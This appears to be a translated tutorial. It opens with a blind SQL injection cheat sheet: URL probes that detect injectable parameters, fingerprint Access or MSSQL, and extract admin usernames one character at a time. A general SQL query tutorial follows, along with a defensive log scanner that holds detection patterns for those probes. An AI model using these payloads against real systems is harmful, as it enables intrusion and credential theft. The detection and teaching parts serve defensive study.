
Common SQL injection statements

Checking whether the parameter is injectable

http://127.0.0.1/xx?id=11 and 1=1 (normal page)

http://127.0.0.1/xx?id=11 and 1=2 (error page)


Checking for a table


http://127.0.0.1/xx?id=11 and exists (select * from admin)


Checking for a column


http://127.0.0.1/xx?id=11 and exists (select username from admin)


Checking an ID


http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1)


Checking a length


http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)





Checking whether the database is MSSQL


http://127.0.0.1/xx?id=11 and exists (select * from sysobjects)


Checking whether the character is English (ASCII)


(Access database)

http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)


(MSSQL database)

http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)


Narrowing the range of the English character


(Access database)

http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)


(MSSQL database)

http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)


Checking which character it is


(Access database)

http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)


(MSSQL database)

http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1)
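From the defender's side, the probe shapes listed above are easy to recognise in web-server access logs. The following is an added example, not code from the original post: the log lines are constructed, and the category names and regular expressions are my own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Patterns for the probe shapes described above: boolean tautology tests,
# EXISTS probes against a guessed table, MSSQL fingerprinting via sysobjects,
# and character-by-character comparison with asc(mid()) / unicode(substring()).
PROBE_PATTERNS = {
    "boolean_test": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
    "exists_probe": re.compile(r"\band\s+exists\s*\(\s*select\b", re.I),
    "mssql_fingerprint": re.compile(r"\bsysobjects\b", re.I),
    "char_compare": re.compile(r"\b(asc|unicode)\s*\(\s*(mid|substring)\s*\(", re.I),
}

def flag_request(request_line):
    """Return the set of probe categories found in the query-string values of
    one request line such as 'GET /xx?id=11+and+1%3D1 HTTP/1.1'."""
    parts = request_line.split()
    if len(parts) < 2:
        return set()
    query = urlsplit(parts[1]).query
    hits = set()
    # parse_qsl decodes %xx escapes and '+' so the patterns see plain text.
    for _, value in parse_qsl(query, keep_blank_values=True):
        for name, pattern in PROBE_PATTERNS.items():
            if pattern.search(value):
                hits.add(name)
    return hits

def scan_log(lines):
    """Map the index of each flagged log line to its probe categories."""
    findings = {}
    for i, line in enumerate(lines):
        m = re.search(r'"([^"]*)"', line)  # the quoted request field
        if not m:
            continue
        hits = flag_request(m.group(1))
        if hits:
            findings[i] = hits
    return findings

# Constructed sample log lines (common log format), not from any real server.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /xx?id=11 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /xx?id=11%20and%201=2 HTTP/1.1" 500 88',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /xx?id=11+and+exists+(select+*+from+sysobjects) HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /xx?id=11+and+exists+(select+id+from+admin+where+asc(mid(username,1,1))=97) HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for idx, hits in scan_log(SAMPLE_LOG).items():
        print(idx, sorted(hits))
```

The same line that a 500 response marks as the "error page" in the test above is the one a detection rule should pair with the preceding 200: the two requests differ only in the tautology.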


Commonly used functions


Access: asc(char)  SQL Server: unicode(char)

Purpose: returns the character code (ASCII value) of a character


Access: chr(number)  SQL Server: nchar(number)

Purpose: the inverse of asc; returns the character for a given code


Access: mid(string,N,L)  SQL Server: substring(string,N,L)

Purpose: returns the substring of length L starting at character N, i.e. the characters between N and N+L


Access: abs(number)  SQL Server: abs(number)

Purpose: returns the absolute value of a number (used when guessing Chinese characters)


Access: A between B And C  SQL Server: A between B And C

Purpose: tests whether A lies between B and C


and exists(Select top 1 * From 使用者 order by id)



1. Displaying column names in the query result:

a. With the as keyword: select name as '姓名' from students order by age

b. Directly: select name '姓名' from students order by age


2. Exact queries:

a. Restricting the range with in: select * from students where native in ('湖南', '四川')

b. between...and: select * from students where age between 20 and 30

c. "=": select * from students where name = '李山'

d. like: select * from students where name like '李%' (Note: a "%" in the condition means a partial match, and position matters: this finds entries beginning with "李". To find all entries containing "李", use '%李%'; if "李" should be the second character, use '_李%', '_李' or '_李_'.)

e. [] character-class match: select * from courses where cno like '[AC]%' (expresses an OR relation, similar to "in(...)", and "[]" can also express a range, e.g.: select * from courses where cno like '[A-C]%'; this is a SQL Server / Access extension of LIKE, not standard SQL)



3. Handling date/time types

a. smalldatetime: treat it like a string, e.g.: select * from students where birth >= '1980-1-1' and birth <= '1980-12-31'



4. Aggregate functions

a. count() for totals, e.g.: select count(*) from students (total number of students)

b. avg(column) for the average, e.g.: select avg(mark) from grades where cno='B2'

c. max(column) and min(column) for the maximum and minimum


5. Grouping with group

Commonly used for statistics, e.g. counting per group: select gender,count(sno) from students group by gender (how many male and female students there are)

Note: "group by" the column that gives the angle you want to group from.

For multi-level grouping, simply list the grouping rules. For example, to count male and female students per intake year and major, the grouping rules are intake year (grade), major (mno) and gender (gender), so "group by grade, mno, gender":

select grade, mno, gender, count(*) from students group by grade, mno, gender

group is usually combined with having, e.g. to find students who failed more than one course, grouped by student number (sno):

select sno,count(*) from grades where mark<60 group by sno having count(*)>1



6. UNION

Merges query results, e.g.:

Select * FROM students Where name like '張%' UNION [ALL] Select * FROM students Where name like '李%'



7. Multi-table queries

a. Inner join

select g.sno,s.name,c.coursename from grades g JOIN students s ON g.sno=s.sno JOIN courses c ON g.cno=c.cno

(note that aliases can be referenced)

b. Outer join

b1. Left join

select courses.cno,max(coursename),count(sno) from courses LEFT JOIN grades ON courses.cno=grades.cno group by courses.cno

Left join characteristic: shows every row of the left table, even those whose data is incomplete.

A left outer join returns the rows that exist in the left table but have no match in the right table, plus the inner-join rows.

b2. Right join

Similar to the left join

b3. Full join

select sno,name,major from students FULL JOIN majors ON students.mno=majors.mno

Everything from both tables is shown

c. Self join

select c1.cno,c1.coursename,c1.pno,c2.coursename from courses c1,courses c2 where c1.pno=c2.cno

Aliases solve the problem of referring to the same table twice.

d. Cross join

select lastname+firstname from lastname CROSS JOIN firstname

Equivalent to a Cartesian product



8. Nested queries

a. With the keyword IN, e.g. find students from the same hometown as 豬豬:

select * from students where native in (select native from students where name='豬豬')

b. With the keyword EXISTS; for example, the following two statements are equivalent:

select * from students where sno in (select sno from grades where cno='B2')

select * from students where exists (select * from grades where grades.sno=students.sno AND cno='B2')



9. Sorting with order

a. There are two orderings: asc (ascending) and desc (descending)

b. You can order by an item of the select list, and that item can be given by its position number, e.g.:

select sno,count(*) ,avg(mark) from grades group by sno having avg(mark)>85 order by 3


10. Miscellaneous

a. Identifiers containing spaces should be enclosed in "[]".

b. To find rows with no data in a column, test for null, e.g. select sno,courseno from grades where mark IS NULL

c. Note the difference between any and all in nested queries: any corresponds to the logical operator "||", all to "&&"

d. Beware of a trap when writing negative queries:

e.g., students who have not taken course 'B2':

select students.* from students, grades where students.sno=grades.sno AND grades.cno <> 'B2'

The query above is wrong: it returns every student who has a grade row for some course other than B2, including students who also took B2. The correct form is:

select * from students where not exists (select * from grades where grades.sno=students.sno AND cno='B2')


11. Approach to difficult multi-level nested queries: e.g., students who have taken every course:

select * from students where not exists (select * from courses where NOT EXISTS (select * from grades where sno=students.sno AND cno=courses.cno))

Outermost level: select from the students table, excluding those who have some course they did not take, using not exists. Since the objects under discussion are courses, the second level searches the courses table and excludes the courses that were taken.
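The wrong and right "not B2" queries from item 10d and the double NOT EXISTS from item 11 are easiest to believe when run side by side. This is an added example, not from the original post: the tables, student names and grades are constructed, and the queries run against an in-memory SQLite database.

```python
import sqlite3

# Constructed sample data (not from the original post): three students, three
# courses, and the grade rows recording which student took which course.
SCHEMA = """
CREATE TABLE students (sno TEXT PRIMARY KEY, name TEXT);
CREATE TABLE courses  (cno TEXT PRIMARY KEY, coursename TEXT);
CREATE TABLE grades   (sno TEXT, cno TEXT, mark INTEGER);
INSERT INTO students VALUES ('s1','Ann'),('s2','Bob'),('s3','Cid');
INSERT INTO courses  VALUES ('B1','Algebra'),('B2','Databases'),('B3','Networks');
INSERT INTO grades   VALUES ('s1','B1',80),('s1','B2',90),('s1','B3',70),
                            ('s2','B1',55),('s2','B2',65),
                            ('s3','B1',40);
"""

# The tempting but wrong query from item 10d: the <> test keeps any student
# who has at least one grade row for a course other than B2.
WRONG_NOT_B2 = """
SELECT DISTINCT students.sno FROM students, grades
WHERE students.sno = grades.sno AND grades.cno <> 'B2'
"""

# Correct form: a student qualifies only if no grade row for B2 exists.
RIGHT_NOT_B2 = """
SELECT sno FROM students s
WHERE NOT EXISTS (SELECT * FROM grades WHERE grades.sno = s.sno AND cno = 'B2')
"""

# Item 11 (relational division): students for whom no course is left untaken.
TOOK_ALL = """
SELECT sno FROM students s
WHERE NOT EXISTS (SELECT * FROM courses c
                  WHERE NOT EXISTS (SELECT * FROM grades
                                    WHERE sno = s.sno AND cno = c.cno))
"""

def run(query):
    """Run a query on a fresh in-memory copy of the sample data; return the
    sorted list of sno values it produces."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    rows = con.execute(query).fetchall()
    con.close()
    return sorted(r[0] for r in rows)

if __name__ == "__main__":
    print("wrong:", run(WRONG_NOT_B2))  # s1 and s2 appear although they took B2
    print("right:", run(RIGHT_NOT_B2))  # only s3
    print("all  :", run(TOOK_ALL))      # only s1
```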